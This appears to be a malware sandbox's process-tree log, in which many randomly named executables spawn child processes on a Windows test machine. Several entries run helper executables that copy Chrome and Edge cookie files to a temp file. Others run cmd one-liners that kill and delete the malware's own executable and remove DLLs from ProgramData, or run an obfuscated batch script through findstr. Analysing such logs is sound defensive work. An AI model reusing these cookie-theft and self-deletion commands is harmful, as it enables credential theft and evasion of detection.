                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8388
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7552
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7976
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                        27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8664
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Exc3oKHEC8SDOJuj_UluO42r.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Exc3oKHEC8SDOJuj_UluO42r.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4476
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5820
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7600
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5540
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7904
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe"
            26⤵
            PID:6472
            • C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe
              C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe
              27⤵
              PID:9172
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im K_sMHgG2snZ55p1jUnfCXI2B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe" & del C:\ProgramData\*.dll & exit
                28⤵
                PID:9540
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im K_sMHgG2snZ55p1jUnfCXI2B.exe /f
                  29⤵
                  • Kills process with taskkill
                  PID:8664
          • C:\Users\Admin\Documents\nnLEjxJpRqv53bkammupDnSG.exe
            "C:\Users\Admin\Documents\nnLEjxJpRqv53bkammupDnSG.exe"
            26⤵
            PID:5796
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
              27⤵
              PID:7900
              • C:\Windows\SysWOW64\cmd.exe
                cmd
                28⤵
                PID:8500
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                  29⤵
                  PID:8312
                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\Acre.exe.com
                  Acre.exe.com k
                  29⤵
                  PID:7340
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 30
                  29⤵
                  • Runs ping.exe
                  PID:5652
          • C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe
            "C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe"
            26⤵
            PID:5852
            • C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe
              C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe
              27⤵
              PID:2540
          • C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe
            "C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe"
            26⤵
            PID:8532
            • C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe
              "C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe" -a
              27⤵
              PID:736
• C:\Users\Admin\Documents\3Mgpo3H0qhUtdDnNcu1xxk7b.exe
  "C:\Users\Admin\Documents\3Mgpo3H0qhUtdDnNcu1xxk7b.exe"
  21⤵
  PID:7688
  • C:\Users\Admin\AppData\Roaming\5538156.exe
    "C:\Users\Admin\AppData\Roaming\5538156.exe"
    22⤵
    PID:8092
• C:\Users\Admin\Documents\A5tAHxf6C7Kslj8hdXYFVqNx.exe
  "C:\Users\Admin\Documents\A5tAHxf6C7Kslj8hdXYFVqNx.exe"
  21⤵
  PID:6984
• C:\Users\Admin\Documents\tdH1QUwEjh88PGn_VAadi1Oz.exe
  "C:\Users\Admin\Documents\tdH1QUwEjh88PGn_VAadi1Oz.exe"
  21⤵
  PID:7164
  • C:\Users\Admin\AppData\Local\Temp\11111.exe
    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    22⤵
    PID:5376
  • C:\Users\Admin\AppData\Local\Temp\11111.exe
    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2872
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3372
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7888
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\ZvX_6bwMMcAfCyk5AfSA4_c9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\ZvX_6bwMMcAfCyk5AfSA4_c9.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ETRVZTVf5_ybH1TEVYvEJHZP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ETRVZTVf5_ybH1TEVYvEJHZP.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\ewMsNewtt0J6wG4DgxswUa3L.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\ewMsNewtt0J6wG4DgxswUa3L.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im ewMsNewtt0J6wG4DgxswUa3L.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ewMsNewtt0J6wG4DgxswUa3L.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        taskkill /im ewMsNewtt0J6wG4DgxswUa3L.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\aDQm23dwFH8Ou5eT69EJzj0Y.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\aDQm23dwFH8Ou5eT69EJzj0Y.exe"
          21⤵
            PID:8216
          • C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe
            "C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe"
            21⤵
              PID:8252
            • C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe
              C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe
              22⤵
                PID:8948
          • C:\Users\Admin\Documents\xsbnHFgQKgueXzNmf_0_nIoH.exe
            "C:\Users\Admin\Documents\xsbnHFgQKgueXzNmf_0_nIoH.exe"
            21⤵
              PID:8304
• C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe
  "C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe"
  16⤵
    PID:1736
  • C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe
    "C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe" -a
    17⤵
      PID:6024
• C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
  "C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe"
  16⤵
    PID:4460
  • C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
    C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
    17⤵
      PID:6520
  • C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
    C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
    17⤵
      PID:6732
  • C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
    C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
    17⤵
      PID:5688
• C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe
  "C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe"
  16⤵
    PID:6416
  • C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe
    C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe
    17⤵
      PID:4104
• C:\Users\Admin\Documents\RUp08a6Ht5tbQMWFaZ_rZOYR.exe
  "C:\Users\Admin\Documents\RUp08a6Ht5tbQMWFaZ_rZOYR.exe"
  16⤵
    PID:6120
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
    17⤵
      PID:5192
    • C:\Windows\SysWOW64\cmd.exe
      cmd
      18⤵
        PID:4772
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
        19⤵
          PID:7528
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\Acre.exe.com
        Acre.exe.com k
        19⤵
          PID:7980
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 30
        19⤵
        • Runs ping.exe
          PID:8132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\iL9Vz1eDqXJ2DsVmitTp9Afx.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\iL9Vz1eDqXJ2DsVmitTp9Afx.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\BCTRAaFEOh_sGjhwd1LBG7Td.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\BCTRAaFEOh_sGjhwd1LBG7Td.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5940
            • C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe
              C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe
              17⤵
                PID:5600
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im S11e899IbyacUn8jdIntg5pq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe" & del C:\ProgramData\*.dll & exit
                  18⤵
                    PID:7344
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im S11e899IbyacUn8jdIntg5pq.exe /f
                      19⤵
                      • Kills process with taskkill
                      PID:8044
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      19⤵
                      • Delays execution with timeout.exe
                      PID:5740
          • C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe
            "C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe"
            16⤵
              PID:5724
              • C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe
                C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe
                17⤵
                  PID:2124
• C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
  "C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe"
  11⤵
    PID:6260
    • C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
      C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
      12⤵
        PID:4396
    • C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
      C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
      12⤵
        PID:7060
• C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe
  "C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe"
  11⤵
    PID:6352
    • C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe
      "C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe"
      12⤵
        PID:7844
• C:\Users\Admin\Documents\ASaC004IgLa85bUKzMXbYlnG.exe
  "C:\Users\Admin\Documents\ASaC004IgLa85bUKzMXbYlnG.exe"
  11⤵
    PID:6584
• C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe
  "C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe"
  11⤵
    PID:6600
    • C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe
      "C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe"
      12⤵
        PID:6652
• C:\Users\Admin\Documents\dTW_t_I3HziiLc3zXkwjuWR2.exe
  "C:\Users\Admin\Documents\dTW_t_I3HziiLc3zXkwjuWR2.exe"
  11⤵
    PID:6636
• C:\Users\Admin\Documents\jqLi3WrirxOz9W5K9rLNAvyK.exe
  "C:\Users\Admin\Documents\jqLi3WrirxOz9W5K9rLNAvyK.exe"
  11⤵
    PID:6660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 1080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6420
